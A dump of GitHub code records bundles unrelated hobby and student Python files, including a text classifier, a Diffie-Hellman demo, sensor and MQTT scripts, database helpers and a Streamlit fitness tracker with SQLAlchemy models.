<alu0101124896@ull.edu.es>\nSince: Sprint 2021\nCollege: University of La Laguna\nDegree: Computer Science - Advanced Artificial Intelligence\nDescription: This program estimates the probabilities of the languaje model\n from given train corpus and classifies the given test corpus documents into\n the learned classes\n\"\"\"\n\nimport time\n\nfrom src.vocabulary_parser import parse_vocabulary\nfrom src.classes_parser import parse_classes\nfrom src.corpus_parser import split_corpus, corpus_to_test\nfrom src.probabilities_estimator import estimate_probabilities\nfrom src.corpus_classifier import classify_corpus, check_precision\n\n\ndef main():\n \"\"\"\n Function to execute everything at once\n \"\"\"\n start = time.perf_counter()\n\n # corpusFile = input(\"Main corpus input file (Default = ./data/ecom-train.csv):\"\n # ) or \"./data/ecom-train.csv\"\n corpus_file = \"./data/ecom-train.csv\"\n\n parse_vocabulary(input_file=corpus_file, output_to_file=True)\n parse_classes(input_file=corpus_file, output_to_file=True)\n split_corpus(input_file=corpus_file, output_to_file=True)\n estimate_probabilities(output_to_file=True)\n corpus_to_test(input_file=corpus_file, output_to_file=True)\n classify_corpus(output_to_file=True)\n check_precision(original_file=corpus_file)\n\n end = time.perf_counter()\n print(f\"\\nThe time spent in the main function was {end - start} seconds\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"alu0101124896/NLP-Text-Classification","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"36507183936","text":"#Протокол Деффи-Хелмана\nimport random\ndef chif(p,g):\n\tz=int(input(\"Введите количество участников чата\"))\n\tprint(\"Изначально всем участникам извстны следующее числа p = %d и g = %d\"%(p,g))\n\tpriv=[]\n\tprint(\"Каждая сторона выберает свое уникальное число\")\n\tfor i in range(z):\n\t\te=random.randint(1,p-1)\n\t\tpriv.append(e)\n\tprint(priv)\n\tprint(\"Все игроки поделились своеми публичными ключами, теперь на основе полученых ключей они расчитают\")\n\toutzn=[]\n\tfor i in range(z):\n\t\tb=g\n\t\tfor j in range(z):\n\t\t\tif i==j:\n\t\t\t\tNone\n\t\t\telse:\n\t\t\t\tb=b**priv[j]%p\n\t\toutzn.append(b)\n\t\tprint(\"Учистник %d выбрал параметр %d и после того как расчитали получили участник %d получил следующее число %d\"%(i+1,priv[i],i+1,b))\n\tprint(outzn)\n\tprint(\"Теперь каждый считает ключ который должен быть у всех одинаковый\")\n\trez=[]\n\tfor i in range(z):\n\t\tpp=(outzn[i]**priv[i])%p\n\t\trez.append(pp)\n\tprint(rez)\n\np=3011\ng=random.randint(1,p-1)\nchif(p,g)\n\n","repo_name":"AppallingFiend/MyProfile","sub_path":"DefHelm.py","file_name":"DefHelm.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39844040079","text":"import constants\nimport comms.queueHandler \nimport lib.packageJSON \nimport lib.helpers \nimport sensors.readTemperature \nimport sensors.readMoisture\nimport sensors.readLight\n#import paho.mqtt.client as mqtt\nimport time\n\ndef record_temperature(client, temperature_sensor, host_name):\n current_temperature = sensors.readTemperature.read_temperature(temperature_sensor)\n message_json = lib.packageJSON.package_value(\n constants.plant_id,\n constants.temperature_label,\n current_temperature, \n lib.helpers.get_now_string(constants.now_string_format),\n host_name)\n comms.queueHandler.publish_message(client, message_json, constants.topic_air_temperature)\n\ndef record_moisture(client, moisture_sensor, host_name):\n current_moisture = sensors.readMoisture.read_moisture(moisture_sensor)\n current_moisture_voltage = sensors.readMoisture.read_voltage(moisture_sensor)\n\n message_json = lib.packageJSON.package_value(\n constants.plant_id,\n constants.moisture_label,\n current_moisture, \n lib.helpers.get_now_string(constants.now_string_format),\n host_name)\n comms.queueHandler.publish_message(client, message_json, constants.topic_moisture)\n \n message_json = lib.packageJSON.package_value(\n constants.plant_id,\n constants.moisture_voltage_label,\n current_moisture_voltage, \n lib.helpers.get_now_string(constants.now_string_format),\n host_name)\n comms.queueHandler.publish_message(client, message_json, constants.topic_moisture)\n\ndef record_light(client, light_sensor, host_name):\n current_light = sensors.readLight.read_light(light_sensor)\n message_json = lib.packageJSON.package_value(\n constants.plant_id,\n constants.light_label,\n current_light, \n lib.helpers.get_now_string(constants.now_string_format),\n host_name)\n comms.queueHandler.publish_message(client, message_json, constants.topic_light)\n\ndef main():\n host_name = lib.helpers.get_hostname()\n\n if(constants.read_temperature):\n temperature_sensor = sensors.readTemperature.get_sensor(constants.air_temp_pin)\n if(constants.read_moisture):\n moisture_sensor = sensors.readMoisture.get_sensor(constants.moisture_pin, constants.moisture_dry_voltage, constants.moisture_wet_voltage)\n if(constants.read_light):\n light_sensor = sensors.readLight.get_sensor(constants.light_pin)\n\n client = comms.queueHandler.get_client(constants.clientPublishName, constants.brokerAddress)\n\n while True:\n if(constants.read_temperature):\n record_temperature(client, temperature_sensor, host_name)\n\n if(constants.read_moisture):\n record_moisture(client, moisture_sensor, host_name)\n\n if(constants.read_light):\n record_light(client, light_sensor, host_name)\n\n time.sleep(constants.read_sensor_interval)\n \n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Tartanyak/PlantNet","sub_path":"plant_monitor.py","file_name":"plant_monitor.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4783634494","text":"import sys\nimport os\nimport string\nimport mrs\n\n\ndef sortList(text):\n return sorted(text, key= lambda x: x[1], reverse=True)\n\ndef top_Kquery(text, k):\n return text[:k]\n\ndef process():\n cur_ = os.getcwd()\n dir_ = os.path.join(cur_, \"outputdocs\")\n fname = os.path.join(dir_,\"source_0_split_0_.mtxt\")\n with open(fname, \"r\") as f:\n text = f.readlines()\n\n for i in text:\n text[text.index(i)] = tuple(i.split())\n \n\n return text\n\n\nif __name__ == '__main__':\n\n sorted_txt = sortList(process())\n query = [10,20]\n for k in query:\n topkquery = open(\"./outputdocs/top\"+ str(k) + \"_kquery.txt\", \"w\")\n topkquery.write(\"Top: \"+ str(k) + \" occuring words\\n\")\n for i in top_Kquery(sorted_txt,k):\n topkquery.write(i[0] + \" \" + i[1] + \"\\n\")\n\n topkquery.close()\n","repo_name":"witseie-elen4020/group09-lab3-2022","sub_path":"topk_queryMethod2.py","file_name":"topk_queryMethod2.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4657546061","text":"import requests as rqt\n\nDIC_DOMINIOS = {}\n\n\ndef getDomains():\n \"\"\"Abre o arquivo dominios.txt e salva seus elementos em um dicionário\"\"\"\n\n with open(\"dominios.txt\", \"r\") as f:\n for x in f.readlines():\n domi, addr = x[:-1].split(\" \")\n DIC_DOMINIOS[domi] = addr\n\n\ndef dns(domain):\n \"\"\"Simula o funcionamento de um DNS\"\"\"\n getDomains()\n\n # Checa se o domínio está presente na database offline\n if domain in DIC_DOMINIOS.keys():\n return DIC_DOMINIOS.get(domain)\n\n # Caso não encontre, procura na internet\n verification = rqt.get(\"https://{}\".format(domain), stream=True)\n if verification.status_code in [404, 400]:\n return \"NOT FOUND\"\n\n found_ip = verification.raw._connection.sock.getpeername()\n string_to_send = \"{}:{}\".format(found_ip[0], found_ip[1])\n DIC_DOMINIOS.update({domain: string_to_send})\n\n return string_to_send\n","repo_name":"sociedade-do-pastel/SMTP-2","sub_path":"dns_server.py","file_name":"dns_server.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74805901370","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\n\nimport MySQLdb\nimport MySQLdb.cursors\nimport pymysql\n\nfrom twisted.enterprise import adbapi\n\n\nclass TunefindspiderPipeline(object):\n def process_item(self, item, spider):\n return item\n\n\nclass MysqlTwistedPipeline(object):\n #twist异步连接,进行mysql数据库操作\n def __init__(self,dbpool):\n self.dbpool = dbpool\n\n @classmethod\n def from_settings(cls,settings):\n dbparams = dict(\n host = settings[\"MYSQL_HOST\"],\n db = settings[\"MYSQL_DBNAME\"],\n user = settings[\"MYSQL_USER\"],\n passwd = settings[\"MYSQL_PASSWORD\"],\n charset = \"utf8\",\n cursorclass =MySQLdb.cursors.DictCursor,\n use_unicode = True,\n )\n\n #创建连接池\n dbpool = adbapi.ConnectionPool(\"MySQLdb\",**dbparams)\n\n return cls(dbpool)\n\n\n def process_item(self, item, spider):\n #数据库操作\n # if item.QUREY:\n # query = self.dbpool.runInteraction(self.do_query,item)\n\n query = self.dbpool.runInteraction(self.do_insert, item)\n query.addErrback(self.handle_error, item, spider)\n\n def handle_error(self, failure, item, spider):\n #处理异常\n print(failure)\n\n\n def do_insert(self, cursor, item):\n #入库\n insert_sql, params = item.get_insert_sql()\n cursor.execute(insert_sql, params)\n\n\n\n\n\n\n","repo_name":"xuantianqiang/mytunefindspider","sub_path":"TunefindSpider/TunefindSpider/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28560108581","text":"'''\nDescription: This file contains the code for the DTPM module.\n'''\nimport sys\n\nfrom gym_ds3.envs.power import DTPM_policies as DTPM_policies\nfrom gym_ds3.envs.power import DTPM_power_models as DTPM_power_models\nfrom gym_ds3.envs.utils import DASH_Sim_utils\n\n\nclass DTPMmodule:\n '''\n The DTPM module is responsible for evaluating the PE utilization and changing the V/F according to the defined policy\n '''\n def __init__(self, args, env, env_storage, resource_matrix, PEs):\n '''\n env: Pointer to the current simulation environment\n resource_matrix: The data structure that defines power/performance\n PEs: The PEs available in the current SoC\n timestamp_last_update: Contains the timestamp from the last time each PE was evaluated\n '''\n self.args = args\n self.env = env\n self.env_storage = env_storage\n self.resource_matrix = resource_matrix\n self.PEs = PEs\n self.timestamp_last_update = [-1] * len(PEs)\n self.timestamp_sample_update = 0\n\n if args.verbose:\n print('[D] DVFS module was initialized')\n\n def evaluate_PE(self, resource, current_PE, timestamp):\n\n if self.timestamp_last_update[current_PE.ID] != timestamp and timestamp != self.args.initial_timestamp:\n\n self.timestamp_last_update[current_PE.ID] = timestamp\n\n DASH_Sim_utils.update_PE_utilization_and_info(self.args, self.env_storage, current_PE, timestamp)\n\n if self.args.verbose:\n print('%12s' % (''), 'Utilization for %s is %.2f' % (current_PE.name, current_PE.utilization))\n\n if resource.DVFS == 'ondemand' or resource.DVFS == 'powersave' or str(resource.DVFS).startswith(\"constant\"):\n # The only DVFS mode that does not require OPPs is the performance one\n if len(resource.OPP) == 0:\n print(\"[E] PEs using %s DVFS mode must have at least one OPP, please check the resource file\" % resource.DVFS)\n sys.exit()\n\n # Apply Monte Carlo method for the expert feedback, if enabled\n # if args.monte_carlo_simulations and str(resource.DVFS).startswith(\"constant\") and args.CHECKPOINT_CREATE_TMP:\n # if len(args.DVFS_cfg_monte_carlo[current_PE.ID]) > 1:\n # random_walk_decision = args.DVFS_cfg_monte_carlo[current_PE.ID][args.sample_counter]\n # if random_walk_decision == -1:\n # DTPM_power_models.decrease_frequency(resource, current_PE, timestamp)\n # elif random_walk_decision == 0:\n # DTPM_power_models.keep_frequency(resource, current_PE, timestamp)\n # elif random_walk_decision == 1:\n # DTPM_power_models.increase_frequency(resource, current_PE, timestamp)\n # else:\n # print(\"[E] Monte carlo list could not be parsed correctly\")\n # sys.exit()\n # else:\n # DTPM_power_models.keep_frequency(resource, current_PE, timestamp)\n\n # Custom DVFS policies\n if resource.DVFS == 'ondemand':\n DTPM_policies.ondemand_policy(resource, current_PE, self.env.now)\n if resource.DVFS == 'imitation-learning':\n DTPM_policies.imitation_learning_policy_L1(resource, current_PE, self.env.now)\n\n # Update temperature\n if timestamp % self.args.sampling_rate_temperature == 0:\n current_PE.current_temperature_vector = DTPM_power_models.predict_temperature(current_PE)\n\n if resource.DVFS != 'none':\n # DASH_Sim_utils.f_trace_frequency(self.env.now, current_PE)\n if self.args.verbose:\n print(\"[D] \", current_PE.ID, current_PE.current_temperature_vector)\n # DASH_Sim_utils.f_trace_PEs(self.env.now, current_PE)\n # DASH_Sim_utils.f_create_dataset_L1(self.env.now, current_PE)\n # DASH_Sim_utils.f_create_checkpoint(self.env.now, current_PE)\n\n # Reset the energy of the sampling period\n current_PE.energy_sampling_period = 0\n\n if self.timestamp_sample_update != timestamp:\n # Increment the sample counter\n # args.sample_counter += 1\n self.timestamp_sample_update = timestamp\n\n def evaluate_idle_PEs(self):\n '''\n Check all PEs and, for those that are idle, adjust the frequency and power accordingly.\n '''\n if self.args.verbose:\n print('[D] Time %s: DVFS module is evaluating PE utilization' % self.env.now)\n for i, resource in enumerate(self.resource_matrix.list):\n current_PE = self.PEs[i]\n # Only evaluate the PE if there is no process running, otherwise the PE itself will call the DVFS evaluation\n if current_PE.process.count == 0:\n self.evaluate_PE(resource, current_PE, self.env.now)\n # Update the power dissipation to be only the static power as the PE is currently idle\n current_PE.current_power = current_PE.current_leakage\n","repo_name":"EpiSci/SoCRATES","sub_path":"gym_ds3/envs/power/DTPM.py","file_name":"DTPM.py","file_ext":"py","file_size_in_byte":5192,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"78"} +{"seq_id":"37744936176","text":"import pymongo\r\nimport sqlalchemy\r\n\r\nfrom bson.objectid import ObjectId\r\nfrom pymongo import MongoClient\r\nclient = MongoClient()\r\ndb = client.hrbot\r\ncollection_users = db.users\r\ncollection_unfilled_orders = db.unfilled_orders\r\ncollection_inprocess_orders = db.in_process_orders\r\ncollection_loc = db.locations\r\ncollection_dialogue = db.dialogue_tree\r\n\r\nDB_KEY_USER_ID = 'user_id'\r\nDB_LOC_ID = 'uid'\r\n\r\ndef get_last_order(user_id):\r\n res = collection_unfilled_orders.find_one({DB_KEY_USER_ID:user_id})\r\n if res != None:\r\n return res\r\n else:\r\n order = {DB_KEY_USER_ID: user_id,\r\n 'order_step_id': 1,\r\n 'order_fields': {}\r\n }\r\n collection_users.insert_one(order)\r\n return order\r\n\r\ndef get_info_dialogue_step(step_id):\r\n res = collection_dialogue.find_one({'id': step_id})\r\n return res\r\n\r\ndef insert_answr_order(user_id, answer):\r\n res = get_last_order(user_id)\r\n current_step_info = get_info_dialogue_step(res['order_step_id'])\r\n if current_step_info == None:\r\n raise CurrentStepError('Error step for user {0}'.format(user_id), 'Возникла ошибка. Просим заполнить запрос заново.' )\r\n anticipating = current_step_info['set_anticipated_field']\r\n if len(set(current_step_info[filled]) - set(res['order_fields'].keys())) == 0:\r\n insert_user_answer(user_id, anticipating, answer, order=res)\r\n else:\r\n pass #exception\r\n if type(current_step_info['next']) == dict:\r\n if answer in current_step_info['next'] and type(current_step_info['next'][answer]) == str:\r\n next_id = current_step_info['next'][answer]\r\n else:\r\n pass #exception\r\n elif type(current_step_info['next']) == str:\r\n next_id = current_step_info['next']\r\n else:\r\n raise Bot_Exception()\r\n\r\n update_order_step(user_id, next_id, order=res)\r\n\r\n\r\n\r\ndef update_order_step(user_id, next_id, order=None):\r\n if order == None:\r\n res = collection_unfilled_orders.find_one({DB_KEY_USER_ID: user_id})\r\n else:\r\n res=order\r\n collection_unfilled_orders.update_one({DB_KEY_USER_ID: user_id}, {'$set': {'order_step_id': next_id}})\r\n\r\ndef insert_user_answer(user_id, anticipated_info, answer, order=None):\r\n if order == None:\r\n res = collection_unfilled_orders.find_one({DB_KEY_USER_ID: user_id})\r\n else:\r\n res=order\r\n filled_fields = res['order_fields']\r\n filled_fields[anticipated_info] = answer\r\n collection_unfilled_orders.update_one({DB_KEY_USER_ID: user_id}, {'$set': {'order_fields': filled_fields}})\r\n\r\n\r\ndef check_user(user_id, key_list):\r\n search = collection_users.find_one({DB_KEY_USER_ID: user_id})\r\n keys_list = set(key_list) #преобразование кортежа во множество\r\n keys_search = set(search.keys())\r\n print( 'check user', keys_list.issubset(keys_search))\r\n return keys_list.issubset(keys_search)\r\n\r\ndef get_anticipated_info(user_id):\r\n search = collection_users.find_one({DB_KEY_USER_ID: user_id})\r\n if 'anticipated_info' in search:\r\n return search['anticipated_info']\r\n else:\r\n return None\r\n\r\ndef set_anticipated_info(user_id, key_info):\r\n collection_users.update_one({DB_KEY_USER_ID: user_id}, {'$set': {'anticipated_info': key_info}})\r\n\r\ndef missing_keys(user_id, key_list):\r\n search = collection_users.find_one({DB_KEY_USER_ID: user_id})\r\n keys_list = set(key_list)\r\n keys_search = set(search.keys())\r\n print('missing keys', keys_list.difference(keys_search))\r\n return list(keys_list.difference(keys_search))\r\n\r\ndef get_user_data_to_db(key, value, user_id):\r\n print('get user data to db: {0}, {1}:{2}'.format(user_id, key, value))\r\n collection_users.update_one({DB_KEY_USER_ID: user_id}, {'$set': {key: value}})\r\n\r\ndef show_personal_info(user_id):\r\n search = collection_users.find_one({DB_KEY_USER_ID: user_id})\r\n f = search['pi_1family_name']\r\n n = search['pi_2personal_name']\r\n o = search['pi_3fathers_name']\r\n t = search['pi_4phone']\r\n return f, n, o, t\r\n\r\ndef delete_order_by_user_id(user_id):\r\n collection_unfilled_orders.remove({DB_KEY_USER_ID:user_id})\r\n\r\ndef create_new_user(user_id):\r\n if collection_users.find_one({DB_KEY_USER_ID:user_id}) == None:\r\n result = collection_users.insert_one({DB_KEY_USER_ID:user_id})\r\n print(result.inserted_id)\r\n\r\ndef set_document_copy_to_db(user_id):\r\n collection_unfilled_orders.insert_one({DB_KEY_USER_ID:user_id, 'type_document':'copy'})\r\n\r\ndef set_documents_amount_to_db(user_id, amount):\r\n collection_unfilled_orders.update_one({DB_KEY_USER_ID: user_id}, {'$set': {'amount': amount}})\r\n\r\ndef set_info_sheet_to_db(user_id):\r\n collection_unfilled_orders.insert_one({DB_KEY_USER_ID:user_id, 'type_document':'info_sheet'})\r\n\r\ndef show_order_info(user_id):\r\n search = collection_unfilled_orders.find_one({DB_KEY_USER_ID: user_id})\r\n type = search['type_document']\r\n amount = search['amount']\r\n if 'subtype_document' in search:\r\n subtype = search['subtype_document']\r\n else:\r\n subtype = 'NA'\r\n if 'period'in search:\r\n period = search['period']\r\n else:\r\n period = 'NA'\r\n return type, amount, subtype, period\r\n\r\ndef set_location_to_db(user_id, loc_name):\r\n collection_unfilled_orders.update_one({DB_KEY_USER_ID: user_id}, {'$set': {'location': loc_name}})\r\n\r\ndef get_loc_by_id(uid):\r\n location = collection_loc.find_one({DB_LOC_ID : uid})\r\n return location\r\n\r\ndef transfer_order_to_inprocess(user_id):\r\n col_source = collection_unfilled_orders\r\n col_target = collection_inprocess_orders\r\n #copy data from unfilled orders to inprocess orders\r\n # indexes from source_Collection will not copied in target_Collection\r\n col_source.aggregate([ {'$match': {DB_KEY_USER_ID:user_id} }, {'$out': str(col_target) } ])\r\n #remove data from unfilled orders\r\n col_source.remove({DB_KEY_USER_ID:user_id})\r\n","repo_name":"yulqui/HR_bot","sub_path":"db_bot.py","file_name":"db_bot.py","file_ext":"py","file_size_in_byte":5970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29938319323","text":"import json\nimport logging\nimport os\nimport sys\n\nfrom commands import cmd_login, cmd_register, cmd_check, cmd_disable\n\nCOMMAND_MAP = {\n \"login\": cmd_login,\n \"register\": cmd_register,\n \"check\": cmd_check,\n \"disable\": cmd_disable,\n}\n\ndef main(event, context):\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n\n # Parse arguments\n command = event[\"command\"]\n command_params = event[\"args\"]\n\n command_func = COMMAND_MAP.get(command)\n if (command_func == None):\n retval = f\"Command {command} not found\"\n logger.warning(retval)\n print(retval)\n sys.exit(1)\n\n logger.info(f\"Executing {command} with params {command_params}\")\n result = command_func(*command_params)\n cleanup_json(command_params[0])\n return result\n\nif __name__ == \"__main__\":\n event = {\n \"command\": sys.argv[1],\n \"args\": sys.argv[2:],\n }\n context = {}\n result = main(event, context)\n print(json.dumps(result))\n\ndef cleanup_json(discord_user_id):\n filepath = f\"/tmp/{discord_user_id}.json\"\n if os.path.exists(filepath):\n os.remove(filepath)\n","repo_name":"FabulousCupcake/suzume","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70872569533","text":"from collections import deque\n\nrows, columns = [int(x) for x in input().split()]\nsnake_string = list(input())\nstring_copy = deque(snake_string)\nmatrix = []\nfor row in range(rows):\n current_row = deque()\n while len(string_copy) < columns:\n string_copy.extend(snake_string)\n for col in range(columns):\n if row % 2 == 0:\n current_row.append(string_copy.popleft())\n else:\n current_row.appendleft(string_copy.popleft())\n\n matrix.append(list(current_row))\n\n[print(*matrix[row], sep= \"\") for row in range(rows)]\n\n\n","repo_name":"KaloyanLevenov/python_advanced_SoftUni_Jan_2023","sub_path":"08_multidimensional_lists_exercise/07_snake_moves.py","file_name":"07_snake_moves.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25128677397","text":"from unicodedata import name\nimport sqlalchemy\nfrom sqlalchemy import create_engine \nfrom sqlalchemy import Column, String, Integer, Float, DateTime, func\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom os import path\nfrom sqlalchemy.orm import sessionmaker\nfrom datetime import datetime, timedelta, date\nimport mysql.connector\nimport streamlit as st\nimport pickle\n\n\ndef ex_muscles_reset():\n ex_muscle_groups = pickle.load(open(\"ex_groups\", \"rb\"))\n print(ex_muscle_groups)\n return ex_muscle_groups\n\n\nBase = declarative_base()\nex_muscle_groups = ex_muscles_reset()\n\n\n\ndef newEx_muscleGroup(exName, musclesUsed):\n currentLib = pickle.load(open(\"ex_groups\", \"rb\"))\n currentLib[exName] = musclesUsed\n\n pickle.dump(currentLib, open(\"ex_groups\", \"wb\"))\n ex_muscle_groups = ex_muscles_reset()\n\n\ndef toWeekDay(num):\n days = { \n 0 : 'monday',\n 1 : 'tuesday',\n 2 : 'wednesday',\n 3 : 'thursday',\n 4 : 'friday',\n 5 : 'saturday',\n 6 : 'sunday'\n\n }\n return days[num]\n\ndef pastDate(days):\n past_date = datetime.now() - timedelta(days=days)\n return past_date\n\nclass Exercise(Base):\n __tablename__ = 'exercise'\n\n id = Column(Integer(), primary_key=True)\n name = Column(String(20))\n reps = Column(Integer)\n sets = Column(Integer)\n weight = Column(Integer)\n date = Column(DateTime(timezone=True), default=func.now())\n\n def addExercise(self, sess):\n sess.add(self)\n sess.commit()\n return 0\n \n def weeklyExercises(self, sess):\n past_date = pastDate(7)\n exercises = sess.query(Exercise).filter(\n Exercise.date > past_date\n ).all()\n return exercises\n \n def populateMuscle_groups(self, sess):\n MuscleGroups = {\n 'chest' : 0,\n 'shoulders' : 0,\n 'triceps' : 0 ,\n 'back' : 0 ,\n 'biceps' : 0 ,\n 'legs' : 0,\n }\n exercises = self.weeklyExercises(sess)\n for ex in exercises:\n for group in ex_muscle_groups[ex.name]:\n MuscleGroups[group] += ex.sets\n \n return MuscleGroups\n\n def weekWorkouts(sess):\n #prima di tutto devo capire che giorno della settimana è questo\n day = datetime.today().weekday() \n past_date = pastDate(day).date()\n print(past_date)\n\n #ora trovo tutti gli esercizi fatti durante la settimana\n exs = sess.query(Exercise).filter(\n Exercise.date > past_date\n ).all()\n \n print(exs)\n #ora li ordino in base alla giornata. Non la giornata della settimana. \n\n ex_by_day = {}\n \n\n for ex in exs: \n weekday = toWeekDay(ex.date.weekday())\n ex_by_day[weekday] = []\n\n for ex in exs: \n weekday = toWeekDay(ex.date.weekday())\n ex_by_day[weekday].append(ex)\n\n print (ex_by_day)\n\n\n return ex_by_day\n \n \n def allExercisesTimeFrame(days, sess):\n #returns all the exercises done in the given timeframe for a given user\n\n pastdate = pastDate(days)\n currentDate = date.today()\n\n exList = sess.query(Exercise).filter(\n Exercise.date > pastdate\n ).all\n\n def currentMax(sess, exName):\n \n currentBest = 0\n best = \" \"\n allExs = sess.query(Exercise).filter_by(name = exName).all()\n for ex in allExs:\n if oneRepMax(ex.weight, ex.reps) > currentBest:\n currentBest = oneRepMax(ex.weight, ex.reps)\n best = f\"{ex.weight}kg x {ex.reps}\"\n\n \n return best\n \n\n\n\n\n\nclass Cardio(Base):\n __tablename__ = 'cardio'\n\n id = Column(Integer(), primary_key=True)\n zone = Column(Integer)\n duration = Column(Integer)\n medium = Column(String(30))\n date = Column(DateTime(timezone=True), default=func.now())\n\n def addCardio(self, sess):\n sess.add(self)\n sess.commit()\n return 0\n\n def weeklyCardio(sess):\n weeklyCardio = 0\n past_date = pastDate(7)\n\n cardioSessions = sess.query(Cardio).filter(\n Cardio.date > past_date\n ).all()\n\n for session in cardioSessions:\n weeklyCardio += session.duration\n \n return weeklyCardio\n \nclass FitnessGoal(Base):\n __tablename__ = 'fitnessgoal'\n\n id = Column(Integer(), primary_key=True)\n name = Column(String(20), unique=True)\n reps = Column(Integer)\n weight = Column(Integer)\n \n def addFitnessGoal(name, weight, reps, sess):\n #qui dovrai aggiungere la ricerca: se esiste già va aggiornato\n goalFound = sess.query(FitnessGoal).filter_by(\n name = name\n ).first()\n\n if goalFound:\n goalFound.weight = weight\n goalFound.reps = reps\n sess.commit()\n print(\"goal updated\")\n\n\n else:\n newGoal = FitnessGoal(name = name, reps = reps, weight = weight)\n sess.add(newGoal)\n sess.commit()\n print(\"goal added\")\n return 0\n \n def goalList(sess):\n goals = sess.query(FitnessGoal).all()\n return goals\n\n\nclass other(Base):\n __tablename__ = 'other'\n\n id = Column(Integer(), primary_key=True)\n name = Column(String(20))\n duration = Column(Integer)\n date = Column(DateTime(timezone=True), default=func.now())\n\n def addOther(self, sess):\n sess.add(self)\n sess.commit()\n return 0\n\n def dailyFocus(sess):\n dailyFocus = 0\n\n focusSessions = sess.query(other).filter(\n other.name == 'focus'\n ).filter(\n other.date > date.today()\n ).all()\n\n\n for session in focusSessions:\n dailyFocus += session.duration\n # Get hours with floor division\n hours = dailyFocus // 60\n\n # Get additional minutes with modulus\n minutes = dailyFocus % 60\n\n \n return [f\"{hours, minutes}\"]\n \n def focusYesterday(sess):\n dailyFocus = 0\n\n focusSessions = sess.query(other).filter(\n other.name == 'focus'\n ).filter(\n other.date == pastDate(1)\n ).all()\n\n\n for session in focusSessions:\n dailyFocus += session.duration\n # Get hours with floor division\n hours = dailyFocus // 60\n\n # Get additional minutes with modulus\n minutes = dailyFocus % 60\n\n \n return f\"{hours, minutes}\"\n \n def focusWeekly(sess):\n days = 7\n totalFocus = 0\n\n focusSessions = sess.query(other).filter(\n other.name == 'focus'\n ).filter(\n other.date > pastDate(7)\n ).all()\n\ndef createApp():\n DB_NAME = \"database\"\n host = st.secrets.mysql.host\n database = st.secrets.mysql.database\n user = st.secrets.mysql.user\n password = st.secrets.mysql.password\n url = f'mysql+mysqlconnector://{user}:{password}@{host}/{database}'\n\n engine = create_engine(url)\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind = engine) #this is to connect to the db (engine)\n sess = Session()\n\n\n\n return sess\n\n\n\ndef oneRepMax(weight, reps):\n oneRepMax = weight / ( 1.0278 - 0.0278 * reps )\n\n return int(oneRepMax)\n\n\n\n\ndef current_maxes(sess, maxesNames):\n \n maxesWeights = []\n\n for exercise in maxesNames:\n allExs = sess.query(Exercise).filter_by(name = exercise).all()\n\n bestWeight = 0\n oneRep = 0\n\n for ex in allExs:\n if oneRepMax(ex.weight, ex.maxReps) > oneRep:\n bestWeight = ex.weight\n oneRep = oneRepMax(ex.weight, ex.maxReps)\n bestString = f\"{bestWeight}kg x {ex.maxReps}\"\n maxesWeights.append(bestString)\n\n return maxesWeights\n\ndef improvementTable(sess):\n tab = {\n 'exercise' : [],\n 'current max' : [],\n 'goal' : [],\n }\n ''' '30 days imp' : [],\n '90 days imp' : [],\n '180 days imp' : []'''\n\n goalList = FitnessGoal.goalList(sess)\n \n for goal in goalList:\n tab['exercise'].append(goal.name)\n\n maxList = []\n for ex in tab['exercise']:\n tab['current max'].append(Exercise.currentMax(sess, ex))\n \n for goal in goalList:\n tab['goal'].append(f\"{goal.weight}kg x {goal.reps}\")\n\n\n\n return tab\n\ndef calendarExercises(sess):\n k = {\n 'monday' : [],\n 'tuesday' : [],\n 'wedsnesday' : [],\n 'thursday' : [],\n 'friday' : [],\n 'saturday' : [],\n 'sunday' : [],\n }\n n_to_day = {\n 0 : 'monday',\n 1 : 'tuesday',\n 2 : 'wedsnesday',\n 3 : 'thursday',\n 4 : 'friday',\n 5 : 'saturday',\n 6 : 'sunday'\n }\n bob = Exercise()\n weekExercises = bob.weeklyExercises(sess)\n for ex in weekExercises:\n date = ex.date.weekday()\n k[n_to_day[date]].append(f\"{ex.name} {ex.weight}kg {ex.sets}x{ex.reps}\")\n \n return k\n\ndef fill(Dict):\n \n maxLength = 0\n\n for key in Dict:\n length = len(Dict[key])\n if length > maxLength: \n maxLength = length\n \n print(\"max length is \", maxLength)\n\n emptyList = [' ' for num in range(maxLength)]\n\n for key in Dict:\n if len(Dict[key]) == 0:\n Dict[key] = emptyList\n elif len(Dict[key]) != 0 and len(Dict[key]) < maxLength:\n difference = maxLength - len(Dict[key])\n for diff in range(difference):\n Dict[key].append(' ')\n","repo_name":"arct0r/training.streamlit","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":9518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70215456571","text":"#!/usr/bin/env python\n# -*- coding: 